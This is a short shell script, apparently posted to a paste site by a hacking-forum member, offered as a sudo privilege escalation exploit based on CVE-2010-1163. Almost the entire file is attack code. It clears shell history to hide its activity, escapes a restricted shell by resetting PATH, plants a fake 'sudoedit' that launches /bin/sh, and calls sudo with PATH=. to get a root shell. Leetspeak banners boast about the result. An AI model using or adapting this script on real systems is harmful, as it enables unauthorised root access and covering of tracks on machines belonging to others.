SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/bin/sh | |
| 2 | # the return of local privilege escalation through PATH manipulation | |
| 3 | # Bug re-discovered by VipVince #HF | |
| 4 | # VipVince 2013 | |
| 5 | # Thanks LevelUp @HF for rbash help, irish br0z for life | |
| 6 | # http://www.hackforums.net/member.php?action=profile&uid=7807 | |
| 7 | ||
| 8 | echo " ################################################ | |
| 9 | # sudo <= 1.8 priv esc (based on CVE-2010-1163)# | |
| 10 | # - VipVince #greetz to HF (2013) # | |
| 11 | # 4b0u7 t0 dr0p r007 5h3ll!! # | |
| 12 | ################################################" | |
| 13 | ||
| 14 | echo "0day0day0day0day0day0day0day0day0day" | |
| 15 | echo "f1r57 w3 br34k 0u7 0f rb45h" | |
| 16 | history -c # clear it homie | |
| 17 | export HISTFILE="~/.bashrc" | |
| 18 | export PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin" | |
| 19 | ||
| 20 | echo "/bin/sh" > sudoedit | |
| 21 | chmod +x sudoedit | |
| 22 | id | |
| 23 | export PATH=. | |
| 24 | /usr/bin/sudo sudoedit /etc/hosts | |
| 25 | id | |
| 26 | echo "1f y0u 4r3 n07 r007, 7ry 4g41n 5k1dz" |
